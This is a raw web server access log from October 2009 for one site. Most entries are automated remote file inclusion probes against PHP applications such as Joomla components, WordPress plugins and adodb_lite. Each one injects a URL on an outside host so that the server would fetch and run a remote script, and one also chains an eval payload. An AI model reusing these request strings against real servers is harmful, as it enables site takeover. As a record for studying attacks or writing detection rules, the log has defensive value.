74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:31 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:31 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:31 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:45 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:45 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:45 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:45 -0700] "GET /logs/access_090822.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:42:46 -0700] "GET /logs/access_090506.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:42:46 -0700] "GET /logs/access_090514.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:47 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:47 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:47 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:47 -0700] "GET /logs/access_090822.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [30/Oct/2009:09:42:49 -0700] "GET /logs/access_080209.log//xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.158.62.86 - - [30/Oct/2009:09:42:50 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.158.62.86 - - [30/Oct/2009:09:42:50 -0700] "GET /logs//xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:42:50 -0700] "GET /logs/access_081128.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:42:51 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:42:51 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 16066 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [30/Oct/2009:09:42:57 -0700] "GET /logs/access_080808.log//xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:43:04 -0700] "GET /logs/access_090506.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:43:04 -0700] "GET /logs/access_090514.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:43:10 -0700] "GET /logs/access_090627.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.244.236.249 - - [30/Oct/2009:09:43:17 -0700] "GET /logs/access_081128.log////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.244.236.249 - - [30/Oct/2009:09:43:17 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
66.244.236.249 - - [30/Oct/2009:09:43:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 16065 "-" "Mozilla/5.0" "www.dmulk.com"
66.244.236.249 - - [30/Oct/2009:09:43:26 -0700] "GET /logs/access_090627.log////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.89.214.167 - - [30/Oct/2009:09:43:49 -0700] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://124.0.81.2/tmp/bobrok1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.89.214.167 - - [30/Oct/2009:09:43:49 -0700] "GET //skin/uks_gallery_v3010/setup.php?dir=http://124.0.81.2/tmp/bobrok1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:01 -0700] "GET /logs/access_081128.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:01 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:02 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 16065 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:04 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 16065 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:05 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:06 -0700] "GET /logs/access_081128.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:15 -0700] "GET /logs/access_090627.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:44:18 -0700] "GET /logs/access_090627.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:44:30 -0700] "GET /logs/access_080126.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22%2Fwrite.php%3Fdir%3D%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://dir-i.mmuz.com/word/Savant2/Savant2_Plugin_textarea.php+abc_252Fwrite.php'%3ESavant2_Plugin_textarea.php%20abc/write.php%20+%20abc/write.php%20%3Cb%3E...%3C/b%3E%3C/a%3E%3Cbr%3E%3Cspan%20class=s%3Einclude/%3Cb%3Ewrite.php?dir%3C/b%3E=http%3Cwbr%3E://abc.%20%3Cb%3E...%3C/b%3E%20access.log/include/%3Cb%3Ewrite%3Cwbr%3E.php?dir%3C/b%3E=%22;http://www.the%20...%20404%20Not%20Found%20=%20/*include/%3Cb%3Ewrite.php?dir%3C/b%3E=http%3Cwbr%3E:/perdu.ch/cgi-bin%20%3Cb%3E...%3C/b%3E%3Cbr%3E%3C/span%3E%3Cspan%20class=ngrn%3Edir-i.mmuz.com/word/Savant2/Savant2_Plugin_textarea.php+abc_252Fwrite.php%20%3C/span%3E%20%3Cspan%20cignacr/us1:201.232.85.6
208.89.214.167 - - [30/Oct/2009:09:44:50 -0700] "GET /logs/access_090817.log///skin/uks_gallery_v3010/setup.php?dir=http://124.0.81.2/tmp/bobrok1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.89.214.167 - - [30/Oct/2009:09:44:50 -0700] "GET /logs/access_090819.log///skin/uks_gallery_v3010/setup.php?dir=http://124.0.81.2/tmp/bobrok1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:45:28 -0700] "GET /logs/access_080315.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:45:28 -0700] "GET /logs/access_090822.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
99.185.108.226 - - [30/Oct/2009:09:45:29 -0700] "GET /logs/access_080314.log HTTP/1.1" 200 1332415 "-" "yeecl mnqqXlniffljxunlxoiyqq" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:45:30 -0700] "GET /logs/access_080315.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:45:30 -0700] "GET /logs/access_090822.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:45:31 -0700] "GET /logs///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:45:32 -0700] "GET /logs/access_081128.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:45:36 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:45:36 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 16065 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:45:36 -0700] "GET /logs/access.log%20%20///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:45:40 -0700] "GET //appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:45:40 -0700] "GET /logs///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:45:40 -0700] "GET /logs/access_090807.log///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:45:45 -0700] "GET /logs/access_090612.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22%2Fwrite.php%3Fdir%3D%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://www.womenskiss.org/logs/access_091008.log'%3E<!DOCTYPE%20xhtml%20PUBLIC%20//include/write.php?dir=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:45:45 -0700] "GET /logs/access.log///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [30/Oct/2009:09:45:50 -0700] "GET /logs/access_090627.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
99.185.108.226 - - [30/Oct/2009:09:45:54 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1893701 "-" "opcd gpsipuowwgrmkbmn" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:46:15 -0700] "GET /logs/access_090519.log HTTP/1.0" 200 4041620 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:46:21 -0700] "GET /logs/access_081128.log////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:46:35 -0700] "GET //appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:46:48 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:47:00 -0700] "GET /logs/access_080129.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:09:47:22 -0700] "GET /logs/access_090627.log////?_SERVER[DOCUMENT_ROOT]=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:47:27 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:47:27 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:47:27 -0700] "GET /logs/access_090130.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:47:27 -0700] "GET /logs/access_090705.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:47:31 -0700] "GET /logs/access_080531.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:48:27 -0700] "GET /logs/access_090701.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:48:39 -0700] "GET /logs/access_090701.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:09:48:39 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:09:48:40 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:09:48:40 -0700] "GET /logs/access_080620.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:09:48:45 -0700] "GET /logs/access_081001.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:49:00 -0700] "GET /logs/access_090314.log//skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:49:01 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:49:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:49:02 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:49:02 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:49:02 -0700] "GET /logs/access_080626.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:49:34 -0700] "GET /logs/access_090807.log%20%20///appserv/main.php/?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:49:40 -0700] "GET /logs/access_090408.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:09:49:45 -0700] "GET /logs/access_080812.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:50:09 -0700] "GET /logs/access_090807.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:50:10 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:50:11 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:50:14 -0700] "GET /logs/access_090816.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:50:20 -0700] "GET /logs/access_080313.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:48 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:48 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:48 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:56 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:56 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:58 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:50:58 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:52:06 -0700] "GET /logs/access_080313.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:52:08 -0700] "GET /logs/access_090226.log HTTP/1.0" 200 3168179 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:52:38 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:52:38 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:52:38 -0700] "GET /logs/access_080416.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:52:41 -0700] "GET /logs/access_080513.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
